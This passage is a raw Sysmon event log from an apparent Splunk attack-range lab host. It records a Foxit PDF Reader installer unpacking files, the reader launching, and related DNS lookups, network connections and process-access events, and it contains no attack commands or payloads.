Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=1132BC30E14F785DC94B0968B316920E,SHA256=A8A2AC478388A25808F3AA578B7F62767F0CEE3B35D6C82422EAA3A5AD4050B8,IMPHASH=A6A5EE4AEE40744E22C729923B18481F{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp"C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp" /SL5="$30334,167691783,421376,C:\Users\Administrator\Downloads\FoxitPDFReader121_enu_Setup_Prom.exe" 10341000x800000000000000039319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.762{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.746{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.746{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.746{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000039315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.967{00000000-0000-0000-0000-000000000000}4560cws.connectedpdf.com0type: 5 cws-site-1191008954.us-east-1.elb.amazonaws.com;::ffff:34.236.114.25;::ffff:34.226.74.2;<unknown process> 22542200x800000000000000039314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.803{00000000-0000-0000-0000-000000000000}6408globe-pis.foxitservice.com0type: 5 k8s-clientac-clientac-1bea27c063-867794477.us-east-1.elb.amazonaws.com;::ffff:54.162.170.221;::ffff:54.236.68.254;::ffff:52.87.5.71;<unknown process> 23542300x800000000000000039313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.595{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09DB58ADD3315E28AC3483AEB017076C,SHA256=B348D29ACD3FDAE3778A451A71406EE97DE542659D90DB49E9AF343F985E1035,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.524{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-037MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.715{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50269- 23542300x800000000000000039310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.162{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=240090DD77299EA2189985BF52B7CD70,SHA256=86BAD4C9C87B852AD623294BF8A4D5707D9B1F2123D15EB91D7A347E2DEACAE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.825{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98C2565BA7D259D4A8C956859650D0F0,SHA256=FA7BDBD7F1B7592816E3C2DA8747B27234E27C26FE926E71887CA94F39803F65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015027Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:39.076{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52AFF9A4D70A38044B7D7D0F2A91B928,SHA256=10048C1C3DFA67D732EA43295F6CA806FCD268E7679D4351897759AE005FB300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.524{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-038MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.431{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.431{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x800000000000000039434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.400{FE4C2B44-E2B5-63C7-D305-00000000AF02}5236C:\Users\Administrator\Downloads\FoxitPDFReader121_enu_Setup_Prom.exe 354300x800000000000000039433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.970{00000000-0000-0000-0000-000000000000}4560<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56213-false34.236.114.25ec2-34-236-114-25.compute-1.amazonaws.com443https 354300x800000000000000039432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.953{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60684- 354300x800000000000000039431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.907{00000000-0000-0000-0000-000000000000}6408<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56212-false192.124.249.36cloudproxy10036.sucuri.net80http 354300x800000000000000039430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.893{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61105- 354300x800000000000000039429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.808{00000000-0000-0000-0000-000000000000}6408<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56211-false54.162.170.221ec2-54-162-170-221.compute-1.amazonaws.com443https 354300x800000000000000039428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.740{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50269- 23542300x800000000000000039427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.381{FE4C2B44-E2B5-63C7-D305-00000000AF02}5236ATTACKRANGE\AdministratorC:\Users\Administrator\Downloads\FoxitPDFReader121_enu_Setup_Prom.exeC:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmpMD5=C2468392C1A47E60B40C378318CA142F,SHA256=A20A0540CC72D9EEEAFD60680D5A75C56EEEB6483BE995044DF7FECDFEF30CC1,IMPHASH=F62B90E31ECA404F228FCF7068B00F31truefalse - insufficient disk space 534500x800000000000000039426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.366{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp 23542300x800000000000000039425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.366{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544ATTACKRANGE\AdministratorC:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmpC:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\_isetup\_setup64.tmpMD5=E4211D6D009757C078A9FAC7FF4F03D4,SHA256=388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95,IMPHASH=F672CB51B1362B8101CC947887B02F34truefalse - insufficient disk space 23542300x800000000000000039424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.350{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544ATTACKRANGE\AdministratorC:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmpC:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\FXCUSTOM.dllMD5=ACBE87ED13E8A2448D4E47AEA9923958,SHA256=CA843F1F5F4CB38A945C9865CC5C17F287480C1123C5F6B0D5985472A94B77AE,IMPHASH=EF29A0B6FB2AA8EC42138938AE12510Atruefalse - insufficient disk space 23542300x800000000000000039423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.343{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544ATTACKRANGE\AdministratorC:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmpC:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\error.bmpMD5=C5501CB29AFC1204C0D363D3B292C409,SHA256=EBEECE634EF25DC5678681F81345683FF9103F7E5F085CEEE1424E50AD8EC537,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.343{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544ATTACKRANGE\AdministratorC:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmpC:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exeMD5=A0482A7D4D5F804BEEF642D3F42BEDEB,SHA256=BA063AC1A37375D174FD323A1DFA05E44BA27E94917A1C7F3D5D224688ED82B3,IMPHASH=9E0489BDAC05725973504175B2148FADtruefalse - insufficient disk space 10341000x800000000000000039421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.327{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.327{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.327{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.323{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.323{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.318{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003224C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.318{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003224C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.317{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003224C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.317{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003224C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.316{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.316{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.316{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF 